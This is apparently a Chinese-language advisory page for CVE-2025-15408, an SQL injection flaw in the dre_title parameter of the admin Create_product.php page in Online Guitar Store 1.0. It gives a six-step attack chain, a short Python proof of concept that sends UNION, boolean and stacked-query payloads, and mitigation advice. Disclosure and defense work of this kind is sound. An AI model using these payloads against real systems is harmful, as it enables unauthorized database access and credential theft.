CVE-2025-15408: code-projects在线吉他商店Create

漏洞信息

漏洞编号

CVE-2025-15408

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Guitar Store 1.0

漏洞概述

CVE-2025-15408是code-projects在线吉他商店1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台的Create_product.php文件中，具体问题出现在处理dre_title参数时缺乏有效的输入过滤和参数化查询。攻击者可以通过构造恶意的SQL语句payload，利用该参数注入到数据库查询中，从而实现未授权的数据库操作。漏洞评分CVSS 3.1达到7.3分，属于高危级别。由于攻击向量为网络远程攻击，且无需认证即可利用，因此具有较高的安全风险。公开的漏洞利用代码表明该漏洞可被恶意行为者直接利用，可能导致敏感数据泄露、数据库篡改，甚至在某些配置下实现远程代码执行。

技术细节

该SQL注入漏洞位于Online Guitar Store 1.0的管理面板Create_product.php文件中。漏洞的根本原因在于应用程序在处理用户输入的dre_title参数时，直接将用户可控的数据拼接到SQL查询语句中，而未进行充分的输入验证或使用参数化查询。攻击者可以通过在dre_title参数中注入SQL语句，如使用UNION SELECT、布尔盲注或时间盲注等技术，绕过应用程序的前端限制，直接与后端数据库交互。常见的利用方式包括：1）通过UNION注入获取数据库中的敏感信息，如管理员凭据；2）通过布尔盲注推断数据库内容；3）通过堆叠查询执行恶意SQL命令。由于该文件位于/admin路径下，通常需要管理员权限访问，但漏洞描述表明攻击可远程进行，可能存在访问控制配置不当或路径遍历问题。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为code-projects Online Guitar Store 1.0，确认管理后台路径/admin/Create_product.php存在

STEP 2

步骤2: 访问目标页面

攻击者通过浏览器或工具访问Create_product.php管理页面，获取表单结构

STEP 3

步骤3: 构造恶意payload

攻击者在dre_title参数中注入SQL注入payload，如使用UNION SELECT或布尔盲注技术

STEP 4

步骤4: 绕过输入验证

利用应用程序缺乏参数化查询的缺陷，直接将恶意SQL代码注入到数据库查询中

STEP 5

步骤5: 数据库操作

成功注入后，攻击者可以执行任意SQL命令，获取敏感数据（如用户表、密码哈希）或修改数据库内容

STEP 6

步骤6: 权限提升/持久化

如果获取到管理员凭据，攻击者可以创建后门账户或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15408 SQL Injection PoC
# Target: code-projects Online Guitar Store 1.0
# Vulnerability: SQL Injection in /admin/Create_product.php (dre_title parameter)

target_url = "http://target.com/admin/Create_product.php"

# Basic authentication bypass payload for dre_title parameter
payloads = [
    "test' OR '1'='1",  # Basic injection test
    "test' UNION SELECT 1,2,3,4,5-- -",  # UNION-based injection
    "test'; SELECT * FROM users-- -"  # Data extraction attempt
]

def test_sql_injection(url, param='dre_title'):
    print(f"[*] Testing SQL Injection on {url}")
    print(f"[*] Target parameter: {param}")
    
    for i, payload in enumerate(payloads, 1):
        data = {
            param: payload,
            # Other required form fields may be needed
            'submit': 'Create'
        }
        
        try:
            response = requests.post(url, data=data, timeout=10)
            print(f"[+] Payload {i} sent: {payload}")
            print(f"    Status: {response.status_code}")
            
            # Check for SQL error indicators
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f"    [!] Potential SQL error detected")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("[*] PoC execution completed")
    print("[*] Manual verification recommended")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_sql_injection(target_url)

影响范围

code-projects Online Guitar Store 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1）限制/admin路径的访问权限，仅允许受信任的IP地址访问；2）部署ModSecurity等Web应用防火墙规则拦截可疑SQL语句；3）对dre_title等用户可控参数实施严格的输入白名单验证；4）临时关闭Create_product.php功能模块；5）启用数据库查询日志监控，及时发现异常SQL行为。建议持续关注官方安全公告，尽快部署正式补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15408
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15408
3 Details https://www.cvedetails.com/cve/CVE-2025-15408/
4 VulDB https://vuldb.com/cve/CVE-2025-15408
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr19/issues/2
7 Link https://vuldb.com/?ctiid.339328
8 Link https://vuldb.com/?id.339328
9 Link https://vuldb.com/?submit.728392

CVE-2025-15408: code-projects在线吉他商店Create_product.php SQL注入漏洞